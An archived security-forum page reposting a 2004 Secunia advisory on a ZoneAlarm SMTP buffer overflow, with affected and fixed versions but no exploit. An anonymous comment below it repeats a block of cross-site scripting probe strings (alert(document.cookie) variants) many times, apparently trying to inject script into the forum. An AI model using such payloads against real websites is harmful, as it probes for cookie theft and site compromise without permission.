CastleCops® - ZoneAlarm SMTP Processing Buffer Overflow Vulnerability

Need help? Click here to register for free! Absolutely zero advertisements on this site!

**$9736.22 of $21422.68**

Help CastleCops serve the community on new servers, Donate Here to reach our goal.

	Donation/Premium

	Donations. Become Premium Today!

	Security Central

	· Home · PIRT/Fried Phish · MIRT · SIRT · Deutsch · Wiki · Newsletter · O16/ActiveX · CLSID List · Contest2007 · Downloads · Feedback (send) · Forums · HijackThis · Hijacktrend · LSPs · My Downloads · O18 · O20 · O21 · O22 · O23 · O9 · Premium · Private Messages · Proxomitron · Reviews · Search · StartupList · Stories Archive · Submit News · WsIRT · Your Account · Acceptable Use Policy

Survey

Advisories!: ZoneAlarm SMTP Processing Buffer Overflow Vulnerability

ZoneLabs

ZoneAlarm SMTP Processing Buffer Overflow Vulnerability

Secunia Advisory: SA10921
Release Date: 2004-02-19
Critical:
Highly critical

Impact: System access
Where: From remote

Software: Zone Labs Integrity 4.x
ZoneAlarm 4.x
ZoneAlarm Plus 4.x
ZoneAlarm Pro 4.x

Description:
eEye has discovered a vulnerability in ZoneAlarm and Integrity client, allowing malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error in the SMTP processing system. This can be exploited automatically without any user interaction if the SMTP service is active on a protected system.

Successful exploitation allows execution of arbitrary code with SYSTEM privileges.

The vulnerability has been reported to affect version 4.x. Prior versions are not vulnerable.

Solution:
Update to the following versions:

* ZoneAlarm (Free, Plus, Pro) version 4.5.538.001
* Integrity client version 4.0.146.046
* Integrity client version 4.5.085

Provided and/or discovered by:
eEye Digital Security

Original Advisory:
http://download.zonelabs.com/bin/free/securityAlert/8.html

Please note: The information, which this Secunia Advisory is based upon, comes from third party unless stated otherwise.

Secunia collects, validates, and verifies all vulnerability reports issued by security research groups, vendors, and others.

Found: 1 Related Secunia Security Advisories

- ZoneAlarm TrueVector Device Driver Privilege Escalation

Posted on Thursday, 19 February 2004 @ 11:45:52 UTC by phoenix22 (2257 reads)
[ Trackback ]

"Advisories!: ZoneAlarm SMTP Processing Buffer Overflow Vulnerability" | Login/Create an Account | 2 comments | Search

The comments are owned by the poster. We aren't responsible for their content.

No Comments Allowed for Anonymous, please register

Re: ZoneAlarm SMTP Processing Buffer Overflow Vulnerability (Score: 0)
by Anonymous on Thursday, 19 February 2004 @ 17:04:17 UTC

>'>alert(document.cookie)
>>alert(document.cookie)
alert(document.cookie)
>'>
>'>
AK style=background:url(javascript:alert(document.cookie)) OS
-->alert(document.cookie)
'+alert(document.cookie)+'
+alert(document.cookie)+
>'>alert(document.cookie) (.NET 1.1 specific variant)
>>alert(document.cookie) (.NET 1.1 specific variant)

>'>alert(document.cookie)
>>alert(document.cookie)
alert(document.cookie)
>'>
>'>
AK style=background:url(javascript:alert(document.cookie)) OS
-->alert(document.cookie)
'+alert(document.cookie)+'
+alert(document.cookie)+
>'>alert(document.cookie) (.NET 1.1 specific variant)
>>alert(document.cookie) (.NET 1.1 specific variant)

>'>alert(document.cookie)
>>alert(document.cookie)
alert(document.cookie)
>'>
>'>
AK style=background:url(javascript:alert(document.cookie)) OS
-->alert(document.cookie)
'+alert(document.cookie)+'
+alert(document.cookie)+
>'>alert(document.cookie) (.NET 1.1 specific variant)
>>alert(document.cookie) (.NET 1.1 specific variant)

>'>alert(document.cookie)
>>alert(document.cookie)
alert(document.cookie)
>'>
>'>
AK style=background:url(javascript:alert(document.cookie)) OS
-->alert(document.cookie)
'+alert(document.cookie)+'
+alert(document.cookie)+
>'>alert(document.cookie) (.NET 1.1 specific variant)
>>alert(document.cookie) (.NET 1.1 specific variant)

>'>alert(document.cookie)
>>alert(document.cookie)
alert(document.cookie)
>'>
>'>
AK style=background:url(javascript:alert(document.cookie)) OS
-->alert(document.cookie)
'+alert(document.cookie)+'
+alert(document.cookie)+
>'>alert(document.cookie) (.NET 1.1 specific variant)
>>alert(document.cookie) (.NET 1.1 specific variant)
>'>alert(document.cookie)
>>alert(document.cookie)
alert(document.cookie)
>'>
>'>
AK style=background:url(javascript:alert(document.cookie)) OS
-->alert(document.cookie)
'+alert(document.cookie)+'
+alert(document.cookie)+
>'>alert(document.cookie) (.NET 1.1 specific variant)
>>alert(document.cookie) (.NET 1.1 specific variant)

>'>alert(document.cookie)
>>alert(document.cookie)
alert(document.cookie)
>'>
>'>
AK style=background:url(javascript:alert(document.cookie)) OS
-->alert(document.cookie)
'+alert(document.cookie)+'
+alert(document.cookie)+
>'>alert(document.cookie) (.NET 1.1 specific variant)
>>alert(document.cookie) (.NET 1.1 specific variant)
>'>alert(document.cookie)
>>alert(document.cookie)
alert(document.cookie)
>'>
>'>
AK style=background:url(javascript:alert(document.cookie)) OS
-->alert(document.cookie)
'+alert(document.cookie)+'
+alert(document.cookie)+
>'>alert(document.cookie) (.NET 1.1 specific variant)
>>alert(document.cookie) (.NET 1.1 specific variant)

>'>alert(document.cookie)
>>alert(document.cookie)
alert(document.cookie)
>'>
>'>
AK style=background:url(javascript:alert(document.cookie)) OS
-->alert(document.cookie)
'+alert(document.cookie)+'
+alert(document.cookie)+
>'>alert(document.cookie) (.NET 1.1 specific variant)
>>alert(document.cookie) (.NET 1.1 specific variant)

>'>alert(document.cookie)
>>alert(document.cookie)
alert(document.cookie)
>'>
>'>
AK style=background:url(javascript:alert(document.cookie)) OS
-->alert(document.cookie)
'+alert(document.cookie)+'
+alert(document.cookie)+
>'>alert(document.cookie) (.NET 1.1 specific variant)
>>alert(document.cookie) (.NET 1.1 specific variant)

>'>alert(document.cookie)
>>alert(document.cookie)
alert(document.cookie)

Read the rest of this comment...

Re: ZoneAlarm SMTP Processing Buffer Overflow Vulnerability (Score: 1)
by Paul on Thursday, 19 February 2004 @ 17:14:36 UTC
(User Info | Send a Message) http://www.laudanski.com

And your futile attempt in this comment was to achieve what?

]

	Login

	Nickname Password Security Code: Type Security Code: Usage signifies AUP acceptance · New User? · Click here to create a registered account.

	Related Links

	· del.icio.us! · digg it! · reddit! · TrackBack (0) · HotScripts · W3 Consortium · Zone Labs · More about ZoneLabs · News by phoenix22 Most read story about ZoneLabs: Zone Alarm Pro (ZAP) 4.0.123.012 released

	Article Rating

	Average Score: 0 Votes: 0 Please take a second and vote for this article:

	Options

	Printer Friendly Page


	2002-2008 � Computer Cops LLC dba CastleCops®. All rights reserved. Acceptable Use Policy. Use signifies your agreement. 137ppm 0.658s (0.061s) Making cybercriminals unhappy since 2002*